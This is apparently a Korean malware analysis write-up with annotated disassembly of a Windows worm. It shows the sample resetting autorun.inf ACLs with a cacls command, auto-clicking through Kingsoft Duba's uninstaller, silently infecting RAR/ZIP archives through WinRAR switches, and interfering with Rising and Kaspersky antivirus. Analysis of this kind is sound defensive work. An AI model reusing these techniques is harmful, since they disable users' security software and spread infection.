; Everyone full control -- undoing the ACL-based "autorun.inf immunisation" (a deny ACL on a
; dummy autorun.inf) so the dropper can overwrite it. The push 0 is most likely the uCmdShow
; (SW_HIDE) of the WinExec that follows outside this excerpt, by analogy with the other
; WinExec call sites in this write-up.
seg001:0040D15D                 mov     eax, [ebp+var_4] ; drive / root path (presumably)
seg001:0040D160                 call    GetVolumeInformation ; wrapper; file-system name ends up in var_27C
seg001:0040D160
seg001:0040D165                 mov     eax, [ebp+var_27C]
seg001:0040D16B                 mov     edx, offset s_Ntfs ; "NTFS"
seg001:0040D170                 call    sub_403E98      ; string compare, presumably (sets ZF on equality)
seg001:0040D170
seg001:0040D175                 jnz     short loc_40D1B1 ; not NTFS -> no ACL to fix, skip (target outside this excerpt)
seg001:0040D175
seg001:0040D177                 push    0               ; uCmdShow = SW_HIDE for the later WinExec (inferred)
seg001:0040D179                 push    offset s_CmdCEchoYCacl ; piece: "cmd /c echo Y| cacls "
seg001:0040D17E                 push    [ebp+var_4]     ; piece: drive root
seg001:0040D181                 push    offset s_Autorun_infTG ; piece: "autorun.inf /t /g everyone:F"
seg001:0040D186                 lea     eax, [ebp+var_280] ; destination string for the concatenation (continues outside this excerpt)

제거 대화 상자의 버튼에 클릭(BM_CLICK) 메시지를 보내 Kingsoft Duba(金山毒霸, 금산독패) 2008을 자동으로 제거(uninstall)합니다.
코드:
; KillDuBa -- drive Kingsoft Duba 2008's uninstaller dialog by sending button clicks.
; "#32770" is the standard dialog window class; the title and button captions contained
; non-ASCII text that was lost in this rendering (only "2008", "(&N) >" and "(&U)" survive).
; Sequence: BM_CLICK the "(&N) >" (Next) button twice, wait 0x320 = 800 ms, BM_CLICK the
; "(&U)" (Uninstall, presumably) button twice, wait 0xBB8 = 3000 ms, then WM_SYSCOMMAND/SC_CLOSE
; the first Internet Explorer top-level window ("IEFrame") -- presumably the web page the
; uninstaller opens at the end (not verifiable here).
; No handle is checked: a failed FindWindowA yields 0, and FindWindowExA(0, 0, "Button", ...)
; then searches *top-level* windows, so a click can land on an unrelated window; SendMessageA
; with hWnd = 0 simply fails. Message ids: 0F5h = BM_CLICK, 112h = WM_SYSCOMMAND, 0F060h = SC_CLOSE.
seg001:0040DAB4 KillDuBa        proc near               ; DATA XREF: start+1126o
seg001:0040DAB4                 push    ebx
seg001:0040DAB5                 push    offset s_2008   ; lpWindowName = "     2008         " (dialog title, text stripped)
seg001:0040DABA                 push    offset s_32770_1 ; lpClassName = "#32770" (dialog class)
seg001:0040DABF                 call    FindWindowA     ; uninstaller dialog; 0 if not open (not checked)
seg001:0040DABF
seg001:0040DAC4                 mov     ebx, eax
seg001:0040DAC6                 push    offset s_N>     ; lpszWindow = "   (&N) >" (Next button caption, text stripped)
seg001:0040DACB                 push    offset s_Button_0 ; lpszClass = "Button"
seg001:0040DAD0                 push    0               ; hwndChildAfter = NULL
seg001:0040DAD2                 push    ebx             ; hwndParent = dialog (or 0 -> top-level search)
seg001:0040DAD3                 call    FindWindowExA
seg001:0040DAD3
seg001:0040DAD8                 mov     ebx, eax        ; ebx = Next button (not checked)
seg001:0040DADA                 push    0               ; lParam
seg001:0040DADC                 push    0               ; wParam
seg001:0040DADE                 push    0F5h            ; Msg = BM_CLICK
seg001:0040DAE3                 push    ebx             ; hWnd
seg001:0040DAE4                 call    SendMessageA    ; click "Next"
seg001:0040DAE4
seg001:0040DAE9                 push    0               ; lParam
seg001:0040DAEB                 push    0               ; wParam
seg001:0040DAED                 push    0F5h            ; Msg = BM_CLICK
seg001:0040DAF2                 push    ebx             ; hWnd
seg001:0040DAF3                 call    SendMessageA    ; click "Next" again (same handle)
seg001:0040DAF3
seg001:0040DAF8                 push    320h            ; dwMilliseconds = 800
seg001:0040DAFD                 call    Sleep           ; let the wizard advance
seg001:0040DAFD
seg001:0040DB02                 push    offset s_2008   ; lpWindowName = "     2008         "
seg001:0040DB07                 push    offset s_32770_1 ; lpClassName = "#32770"
seg001:0040DB0C                 call    FindWindowA     ; re-find the dialog (handle may have changed)
seg001:0040DB0C
seg001:0040DB11                 mov     ebx, eax
seg001:0040DB13                 push    offset s_U      ; lpszWindow = "  (&U)" (Uninstall button caption, presumably; text stripped)
seg001:0040DB18                 push    offset s_Button_0 ; lpszClass = "Button"
seg001:0040DB1D                 push    0               ; hwndChildAfter = NULL
seg001:0040DB1F                 push    ebx             ; hwndParent
seg001:0040DB20                 call    FindWindowExA
seg001:0040DB20
seg001:0040DB25                 mov     ebx, eax        ; ebx = Uninstall button (not checked)
seg001:0040DB27                 push    0               ; lParam
seg001:0040DB29                 push    0               ; wParam
seg001:0040DB2B                 push    0F5h            ; Msg = BM_CLICK
seg001:0040DB30                 push    ebx             ; hWnd
seg001:0040DB31                 call    SendMessageA    ; click "Uninstall"
seg001:0040DB31
seg001:0040DB36                 push    0               ; lParam
seg001:0040DB38                 push    0               ; wParam
seg001:0040DB3A                 push    0F5h            ; Msg = BM_CLICK
seg001:0040DB3F                 push    ebx             ; hWnd
seg001:0040DB40                 call    SendMessageA    ; click again
seg001:0040DB40
seg001:0040DB45                 push    0BB8h           ; dwMilliseconds = 3000
seg001:0040DB4A                 call    Sleep           ; wait for the uninstall to run
seg001:0040DB4A
seg001:0040DB4F                 push    0               ; lpWindowName = NULL (any title)
seg001:0040DB51                 push    offset s_Ieframe_0 ; lpClassName = "IEFrame" (Internet Explorer top-level window)
seg001:0040DB56                 call    FindWindowA
seg001:0040DB56
seg001:0040DB5B                 mov     ebx, eax        ; first IE window found, if any (not checked)
seg001:0040DB5D                 push    1               ; lParam
seg001:0040DB5F                 push    0F060h          ; wParam = SC_CLOSE
seg001:0040DB64                 push    112h            ; Msg = WM_SYSCOMMAND
seg001:0040DB69                 push    ebx             ; hWnd
seg001:0040DB6A                 call    SendMessageA    ; close that IE window
seg001:0040DB6A
seg001:0040DB6F                 pop     ebx
seg001:0040DB70                 retn
seg001:0040DB70
seg001:0040DB70 KillDuBa        endp

**를 감염 방식으로 .rar 및 .zip 압축 파일에 삽입 - "WinRAR.exe a -ep -u -inul":
명령줄 모드:
    a      ——압축 파일에 파일 추가
    -ep    ——파일을 추가할 때 경로 정보를 포함하지 않음
    -u     ——파일 업데이트(기존 파일 갱신)
    -inul  ——오류 메시지 표시 금지
코드:
; Excerpt (ebp frame): WinExec("...\WinRAR.exe a -ep -u -inul ...", SW_HIDE).
; Five string pieces are joined (edx = 5): two globals (dword_4149D4 / dword_4149D0 --
; presumably the WinRAR install path and the archive/file arguments, confirm), the fixed
; switch string, a constant (dword_40FF5C) and a local that IDA still labels "uCmdShow"
; (stale name; it is a string argument here). The order of the pieces in the final command
; line cannot be verified from the pushes alone. The first push 0 is the real uCmdShow
; (SW_HIDE) for WinExec. -inul suppresses WinRAR's error messages, so infecting .rar/.zip
; archives is silent.
seg001:0040F7E6                 push    0               ; uCmdShow = SW_HIDE for the WinExec below
seg001:0040F7E8                 push    dword_4149D4    ; piece: global string (WinRAR directory?)
seg001:0040F7EE                 push    offset s_Winrar_exeA-e ; piece: "\\WinRAR.exe a -ep -u -inul "
seg001:0040F7F3                 push    dword_4149D0    ; piece: global string (archive / file to add?)
seg001:0040F7F9                 push    offset dword_40FF5C ; piece: constant string
seg001:0040F7FE                 push    [ebp+uCmdShow]  ; piece: local string (IDA's "uCmdShow" name is stale)
seg001:0040F801                 lea     eax, [ebp+var_1F4]
seg001:0040F807                 mov     edx, 5          ; 5 pieces to join
seg001:0040F80C                 call    sub_403E0C      ; var_1F4 := concatenated command line
seg001:0040F80C
seg001:0040F811                 mov     eax, [ebp+var_1F4]
seg001:0040F817                 call    sub_403F4C      ; string -> PChar (presumably)
seg001:0040F817
seg001:0040F81C                 push    eax             ; lpCmdLine
seg001:0040F81D                 call    WinExec         ; run WinRAR hidden; result not checked

keybd_event로 Win+M(모든 창 최소화)을 입력한 뒤 Rising(서성)의 정상 업그레이드를 막고, Kaspersky(카바) 제거 프로그램을 최소화된 상태로 실행하여 Kaspersky를 제거합니다. 또한 "/c Date 2005-4-20"으로 시스템 날짜를 되돌려 Kaspersky의 능동 방어(Proactive Defense)를 우회한다고 원문은 설명합니다 (날짜 변경 코드는 아래 발췌에 없습니다).
코드:
; Excerpt from the entry routine `start` (the CODE XREF start+E47j places it there; start
; begins and ends outside this listing, and two stretches are elided with "......").
; sub_4076E8(<exe name>) -> al == 1 is used as "that process is running" (inferred from both uses).
; Rising branch: read HKLM\SOFTWARE\rising\Rav\installpath, synthesise Win+M with keybd_event
; (VK_LWIN = 0x5B, 'M' = 0x4D) to minimise all windows, WinExec <installpath>\Update\setup.exe
; with SW_SHOWNORMAL, sleep 1.5 s, start a worker thread (sub_40DBC8, body not shown) and
; sleep 3.5 s. Afterwards, if avp.exe (Kaspersky) is running, jump to `uninstall`.
; The "/c Date 2005-4-20" trick mentioned in the text is not in this excerpt.
seg001:0041129F                 mov     eax, offset s_Ravmon_exe ; "RavMon.exe" (Rising AV monitor)
seg001:004112A4                 call    sub_4076E8      ; process-running check, presumably
seg001:004112A4
seg001:004112A9                 cmp     al, 1
seg001:004112AB                 jnz     loc_411387      ; Rising not running -> skip to the Kaspersky check
seg001:004112AB
seg001:004112B1                 lea     eax, [ebp+var_1D0]
seg001:004112B7                 push    eax             ; out: value buffer
seg001:004112B8                 mov     ecx, offset s_Installpath ; "installpath"
seg001:004112BD                 mov     edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav"
seg001:004112C2                 mov     eax, 80000002h  ; HKEY_LOCAL_MACHINE
seg001:004112C7                 call    RegQueryValue   ; wrapper: var_1D0 := Rising install path (result handling elided)
......
seg001:004112D7
seg001:004112DC                 push    0               ; dwExtraInfo
seg001:004112DE                 push    0               ; dwFlags = 0 -> key down (key-up events are in the elided part)
seg001:004112E0                 push    0               ; uMapType = MAPVK_VK_TO_VSC
seg001:004112E2                 push    5Bh             ; uCode = 0x5B = VK_LWIN (left Windows key)
seg001:004112E4                 call    MapVirtualKeyA  ; -> scan code
seg001:004112E4
seg001:004112E9                 push    eax             ; bScan
seg001:004112EA                 push    5Bh             ; bVk = VK_LWIN
seg001:004112EC                 call    keybd_event     ; press Win
seg001:004112EC
seg001:004112F1                 push    0               ; dwExtraInfo
seg001:004112F3                 push    0               ; dwFlags = key down
seg001:004112F5                 push    0               ; uMapType = MAPVK_VK_TO_VSC
seg001:004112F7                 push    4Dh             ; uCode = 0x4D = 'M' -> Win+M minimises all windows
seg001:004112F9                 call    MapVirtualKeyA
......
seg001:0041132B
seg001:00411330                 push    1               ; uCmdShow = SW_SHOWNORMAL
seg001:00411332                 mov     edx, off_413554
seg001:00411338                 mov     edx, [edx]      ; global string: Rising install path, presumably (stored from the query above)
seg001:0041133A                 lea     eax, [ebp+var_1D4]
seg001:00411340                 mov     ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe"
seg001:00411345                 call    sub_403D98      ; var_1D4 := <installpath>\Update\setup.exe
seg001:00411345
seg001:0041134A                 mov     eax, [ebp+var_1D4]
seg001:00411350                 call    sub_403F4C      ; string -> PChar (presumably)
seg001:00411350
seg001:00411355                 push    eax             ; lpCmdLine
seg001:00411356                 call    WinExec         ; launch Rising's own Update\setup.exe (the text says this blocks normal upgrades); result not checked
seg001:00411356
seg001:0041135B                 push    5DCh            ; dwMilliseconds = 1500
seg001:00411360                 call    Sleep
seg001:00411360
seg001:00411365                 mov     eax, lpThreadId ; global pointer used as lpThreadId
seg001:0041136A                 push    eax             ; lpThreadId
seg001:0041136B                 push    0               ; dwCreationFlags = 0 (run immediately)
seg001:0041136D                 push    0               ; lpParameter = NULL
seg001:0041136F                 push    offset sub_40DBC8 ; lpStartAddress (body not in this listing)
seg001:00411374                 push    0               ; dwStackSize = default
seg001:00411376                 push    0               ; lpThreadAttributes = NULL
seg001:00411378                 call    CreateThread    ; handle is discarded / not checked
seg001:00411378
seg001:0041137D                 push    0DACh           ; dwMilliseconds = 3500
seg001:00411382                 call    Sleep
seg001:00411382
seg001:00411387
seg001:00411387 loc_411387:                             ; CODE XREF: start+E47j
seg001:00411387                 mov     eax, offset s_Avp_exe ; "avp.exe" (Kaspersky)
seg001:0041138C                 call    sub_4076E8      ; process-running check, presumably
seg001:0041138C
seg001:00411391                 cmp     al, 1
seg001:00411393                 jnz     uninstall       ; note: jumps to `uninstall` when avp.exe is NOT reported running (al != 1); target outside this excerpt
......

전재 출처: https://blog.51cto.com/liong/244753
